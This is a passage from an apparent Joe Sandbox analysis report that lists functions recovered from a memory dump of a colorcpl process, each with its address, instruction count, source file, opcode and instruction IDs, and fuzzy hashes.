                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c2de713d0565526f8be6015705e1addb84734fc94c040935ea59dd84ee4aa8e3
                                                                                                                                          • Instruction ID: 419bfb8f1158d406a3d91c1c9c0379281e86468f49e80f38bc045f30be03499b
                                                                                                                                          • Opcode Fuzzy Hash: c2de713d0565526f8be6015705e1addb84734fc94c040935ea59dd84ee4aa8e3
                                                                                                                                          • Instruction Fuzzy Hash: 2931BA7260D7518FD310CF19C940B1AB7E9FB98704F404A6EE9849B350D7B1EC04CBA2
                                                                                                                                          Function 2275A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                          • Instruction ID: 1757a397b1f56ce328656317307b878ca29a4b92be7b2b3307a2c939758318b0
                                                                                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                          • Instruction Fuzzy Hash: 3B312972B08B01AFD761CF69DE41B57B7F8BB08B54F04093DA99AD3651E634E904CB60
                                                                                                                                          Function 227CEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: dac6fecc5ca08333038c31f0ba5fb6946b410d033f0096a22b6489f2f823be4b
                                                                                                                                          • Instruction ID: 0c64bb1c3a320ed700a623c5664b33ba50f98b51402037dcd0f08069e7b47e56
                                                                                                                                          • Opcode Fuzzy Hash: dac6fecc5ca08333038c31f0ba5fb6946b410d033f0096a22b6489f2f823be4b
                                                                                                                                          • Instruction Fuzzy Hash: 02315A7150A341CFC712CF29C68094ABBF1FF99318F4449AAE4889B296D331EE45CB92
                                                                                                                                          Function 2274438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 023a16602a0576ff8963c37d86d4906b769d21f2eadeff563b1c96832e07d2cc
                                                                                                                                          • Instruction ID: 2467e7afb528293351fd92bbdabcbd0a04dc46888395846e67e50ec000051f69
                                                                                                                                          • Opcode Fuzzy Hash: 023a16602a0576ff8963c37d86d4906b769d21f2eadeff563b1c96832e07d2cc
                                                                                                                                          • Instruction Fuzzy Hash: 6B310E31F083459FC710DFA8C990B6EB7F9AB84308F40853AD652E7291EB34D941EB91
                                                                                                                                          Function 2271CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                          • Instruction ID: 208e53792c21452c2ad430e86c481465a4d1f451bf4d6a3511e17fb7b8336861
                                                                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                          • Instruction Fuzzy Hash: 69210636E0A35AAADB01CFB58801BAFB7B5AF55740F018175AE14FB240E234CD00C7E1
                                                                                                                                          Function 227DC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                          • Instruction ID: 5710959399f8f94373eea6d2b7b83aa23db362dfe32783642892d892c5cfd630
                                                                                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                          • Instruction Fuzzy Hash: 2D212B37604751A7CB169BE58804BBABF75EF80714F40841EFAA58B691E734E950C7A0
                                                                                                                                          Function 2271C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9af619e4c8d36fc8575bd082748007bd22526d7c8e02b9bc809ab0b1574f41c
                                                                                                                                          • Instruction ID: 4f5a0075546513c7c40c1ff0f94b2ef54390c1afb9721d34dce91521416ce46d
                                                                                                                                          • Opcode Fuzzy Hash: f9af619e4c8d36fc8575bd082748007bd22526d7c8e02b9bc809ab0b1574f41c
                                                                                                                                          • Instruction Fuzzy Hash: 19314DB25083108BCB129F14CC55BA977B4EF50318F5485A9ED859B3C7EB74DD81CBA0
                                                                                                                                          Function 2271E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8a9468c026b7a939db848ef85b43312647ec4d098846096a3956be8adac05047
                                                                                                                                          • Instruction ID: 265e49e61bafaeea6f85b44978a9f2c89204156d74987a121ac6ac77bdc709f7
                                                                                                                                          • Opcode Fuzzy Hash: 8a9468c026b7a939db848ef85b43312647ec4d098846096a3956be8adac05047
                                                                                                                                          • Instruction Fuzzy Hash: F331D431A4572C9BDB22CF14CD42FEE77B9AF19750F4101A1FA55AB290D6B49E80CFA0
                                                                                                                                          Function 227544B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7e161296b9e30aeaad57ea91ae8a9e827962af8a7565ec20dd2ce4c5a73f532a
                                                                                                                                          • Instruction ID: 801e3adb38e862f2b8a0e9215f5d2bf4cc834eae826f236c07d58c9a3f70e988
                                                                                                                                          • Opcode Fuzzy Hash: 7e161296b9e30aeaad57ea91ae8a9e827962af8a7565ec20dd2ce4c5a73f532a
                                                                                                                                          • Instruction Fuzzy Hash: 9F219172A097659BC712CF18C990F5BB7E5FF88760F014629FD54AB281D730EA11CBA2
                                                                                                                                          Function 22754588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                          • Instruction ID: cf8fb0bc83c0afefaa1cfb4b281bfca7462a147fb904faae3ab60e9fa1766a01
                                                                                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                          • Instruction Fuzzy Hash: A1217F75A04708EFCB11CF59C990A8ABBF5FF48714F508079EE25AF241D671DA15CB90
                                                                                                                                          Function 2271E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                          • Instruction ID: 437d380737d90b00b78f41ddfff6d8a6d99e296493d24ff0a00544df9d0af27e
                                                                                                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                          • Instruction Fuzzy Hash: 61318731608708AFDB12CB68C984F6AB7F8EF89354F1045A9E951DB281E770EA02CB50
                                                                                                                                          Function 2279E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8b67301cfc716f66f7014d6add87ccb0d33d19959bf5f1d3b1b97ad91cf2560d
                                                                                                                                          • Instruction ID: e2b638e0044d51a8b643e24c6d9ef93d4c0397ace952e7ad653d075ff6d800a2
                                                                                                                                          • Opcode Fuzzy Hash: 8b67301cfc716f66f7014d6add87ccb0d33d19959bf5f1d3b1b97ad91cf2560d
                                                                                                                                          • Instruction Fuzzy Hash: 5C318E75A04315DFCB04CF18DA80EAEB7B9FF88304F11455AE9599B392E771EA50CB90
                                                                                                                                          Function 227A06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f40cc40e52f1a1be93e21f3f0902927ccfcabfab6ac92150de4c6beed4dce52b
                                                                                                                                          • Instruction ID: 34db3e03f22c1ee490efbc1e9dee5f09cad715ccb225b94f9e4d72cf403a23a1
                                                                                                                                          • Opcode Fuzzy Hash: f40cc40e52f1a1be93e21f3f0902927ccfcabfab6ac92150de4c6beed4dce52b
                                                                                                                                          • Instruction Fuzzy Hash: D1218B75A003299BCF15CF59C891ABEB7F8FF48754F500569E941EB290D738AD41CBA0
                                                                                                                                          Function 227A019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3b1d5833f3260d9cab512b81c13d3242cd85cd23056483d33448eb793d579e23
                                                                                                                                          • Instruction ID: 45c35ec3c64822b75d5b1cab3e2ea1f8a5976421a6f2ce7d6d1bc67f5ac68792
                                                                                                                                          • Opcode Fuzzy Hash: 3b1d5833f3260d9cab512b81c13d3242cd85cd23056483d33448eb793d579e23
                                                                                                                                          • Instruction Fuzzy Hash: C121BA71604704AFC712CB68C984F6AB7B8FF8C754F100569F904DB6A1D638ED40CBA8
                                                                                                                                          Function 227A0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3bdb80d1298dcb3a4887749e568e8423405fef63ae4b353bdb711871b11eb0eb
                                                                                                                                          • Instruction ID: c15678a6ff620dd38fe340cbd916cc9ef9b8ee98fdce8761a3db2ef5e731a5c1
                                                                                                                                          • Opcode Fuzzy Hash: 3bdb80d1298dcb3a4887749e568e8423405fef63ae4b353bdb711871b11eb0eb
                                                                                                                                          • Instruction Fuzzy Hash: 7321007290C3459FC712CF59D958F6BBBECAF98364F040A6ABD80CB291D734D904C6A2
                                                                                                                                          Function 22742835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 39cff5425178fc9a90fade3391f582a4267f799a94bef54447d34304cc0f8fe2
                                                                                                                                          • Instruction ID: 7bcbdf0b680113f03e6b3415226108acc35f84bafe1bbd9da59c4bb11a5242a9
                                                                                                                                          • Opcode Fuzzy Hash: 39cff5425178fc9a90fade3391f582a4267f799a94bef54447d34304cc0f8fe2
                                                                                                                                          • Instruction Fuzzy Hash: 1521F931A0D7859BE31357698E48F1877E8AF91774F150360EA20EF6D6EFACC851C251
                                                                                                                                          Function 2275A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 94ab46578d20408bea956c1d0ef65dd338a4ce08999eb16d1d9100040ce22868
                                                                                                                                          • Instruction ID: 2b78d2ebe4685a6dff66c0832cca9bcb761a6144cd2f9ba6a895622d057cb358
                                                                                                                                          • Opcode Fuzzy Hash: 94ab46578d20408bea956c1d0ef65dd338a4ce08999eb16d1d9100040ce22868
                                                                                                                                          • Instruction Fuzzy Hash: BC21A979201B509FC726CF28C940B46B3F5AF48708F248968A959CB7A2E735E846CF94
                                                                                                                                          Function 227DA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 58053368b97729598b66afd4940b07575a22c4311bf740d192606c3fba1dad57
                                                                                                                                          • Instruction ID: 71e110ff327fb99d4d4e578b2febe92b9e98e4b071a38f2f98d02ee3464ea4b1
                                                                                                                                          • Opcode Fuzzy Hash: 58053368b97729598b66afd4940b07575a22c4311bf740d192606c3fba1dad57
                                                                                                                                          • Instruction Fuzzy Hash: 8E113A33388B217FE72346588C44F2B7A99EBD4720F600124FB19DB280DB68DC008696
                                                                                                                                          Function 227A0946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e7fb4df735394ada1b77effedff562111bea0ad8040de43ad3719a4cae8590ea
                                                                                                                                          • Instruction ID: bb635f35fc6c1317e3e5572a6d6d1ce6bd2f5a1ce9bff268604ca0f8531a2b0a
                                                                                                                                          • Opcode Fuzzy Hash: e7fb4df735394ada1b77effedff562111bea0ad8040de43ad3719a4cae8590ea
                                                                                                                                          • Instruction Fuzzy Hash: 292107B1E04308ABCB14CFAAD994AAEFBF8BF98710F10062AE405A7254D6749945CB54
                                                                                                                                          Function 227B80A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                          • Instruction ID: f09c1d07316c7a3a95af96261cc30aca70ae7e8aa28c63ff65e78a173509f3c0
                                                                                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                          • Instruction Fuzzy Hash: 07216772A04309AFDB128F98CC44B9EBBBAEF88310F640859F910A7251E734DA50DB50
                                                                                                                                          Function 22750124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                          • Instruction ID: 865386b4cf911361b0bf0ed2b2b61e1026e020cedeece9a2058c1f0b683d62d2
                                                                                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                          • Instruction Fuzzy Hash: 4311BF72609705AFD7228F54CD85FAEBBB8EB88754F100029EE049B190E671EE54DB61
                                                                                                                                          Function 22728770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8650e1c09aed452b81d2f978bf2fdda5237de3b08e4cfa615cb03aef1eb6d87f
                                                                                                                                          • Instruction ID: 57fc66270ed8ad80d9fe3c648d36ed71c78eb1f41390064c939416831619d0d9
                                                                                                                                          • Opcode Fuzzy Hash: 8650e1c09aed452b81d2f978bf2fdda5237de3b08e4cfa615cb03aef1eb6d87f
                                                                                                                                          • Instruction Fuzzy Hash: 60110435705B62DBCB01CF89C6C0A16B7E9EF5A714B94426AEE089F305D6B3D901CBA0
                                                                                                                                          Function 2275AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                          • Instruction ID: 9d50b79261b36b5f07e43c261c9da4b3c135036c7579e4770c4ede4edb70a1bb
                                                                                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                          • Instruction Fuzzy Hash: B0219D72A48B40DFC725CF49D644E56F7E6EB98B10F10817DE9499BA10E738ED15CB80
                                                                                                                                          Function 227280E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bfce842932187bf9a777103f69fa814ecd9b838e36a8cc4e64177707bd500407
                                                                                                                                          • Instruction ID: 05c0631f0341f1b191a85760e2ea469a572a840774182472d8f5babe4cfc9ac9
                                                                                                                                          • Opcode Fuzzy Hash: bfce842932187bf9a777103f69fa814ecd9b838e36a8cc4e64177707bd500407
                                                                                                                                          • Instruction Fuzzy Hash: 9B218E31A44615DFCB04CF58C580A6EBBB6FB88318F60426DD104AB391C772AE06CBA0
                                                                                                                                          Function 2275674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e48b8f39ff1dddd144cb8a18e2a99d4638fcc4bb6be2c7e63893ebb6cb4519c0
                                                                                                                                          • Instruction ID: b82880b26aa04bfefb8d02f74229039da2f1bde474631f67741dd708892c16e7
                                                                                                                                          • Opcode Fuzzy Hash: e48b8f39ff1dddd144cb8a18e2a99d4638fcc4bb6be2c7e63893ebb6cb4519c0
                                                                                                                                          • Instruction Fuzzy Hash: E3216D75508B01EFC7218F68C881F66B3E8FB44750F40882DE99AD7651DA70E950CBA0
                                                                                                                                          Function 227B6870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f503e30531bff184179f27aee31345971eaa75c109cd624493dd2d11973c7d6a
                                                                                                                                          • Instruction ID: a212e06e8a62e478f5019c9446a82a422f805d71a31edf73721334c39c125d36
                                                                                                                                          • Opcode Fuzzy Hash: f503e30531bff184179f27aee31345971eaa75c109cd624493dd2d11973c7d6a
                                                                                                                                          • Instruction Fuzzy Hash: 5D11CE32244704EBD722DB59C980F4A77A8EF99B64F014029F315DB251DA74E900CBA0
                                                                                                                                          Function 2274E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d99da51077a1efad479957b077a27df958b98e608212bae7173bad552934103d
                                                                                                                                          • Instruction ID: 7b5258abc28ada07b829c9c2bb1287997e3c9df2e8fa2370ad8ad1d053b73af7
                                                                                                                                          • Opcode Fuzzy Hash: d99da51077a1efad479957b077a27df958b98e608212bae7173bad552934103d
                                                                                                                                          • Instruction Fuzzy Hash: C6114837609310DBCB0ACB25CD84A5B7266DFD1374B654A28E922DB2C1DD30DD02C292
                                                                                                                                          Function 227566B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 93bcf1e185ff5998459061fa894fe805b73b899de5841f111f916799efa38cf9
                                                                                                                                          • Instruction ID: 45509037731ea9d57eecb6b29334d32cf488ecfc5df53705c06db632ad5e9074
                                                                                                                                          • Opcode Fuzzy Hash: 93bcf1e185ff5998459061fa894fe805b73b899de5841f111f916799efa38cf9
                                                                                                                                          • Instruction Fuzzy Hash: CC11CE76A09356DFCB16CF59CA80E4AFBE9EF94710B018979DD05AB351D634DE00CB90
                                                                                                                                          Function 22720AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1538249660.00000000226F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226F0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_226f0000_colorcpl.jbxd
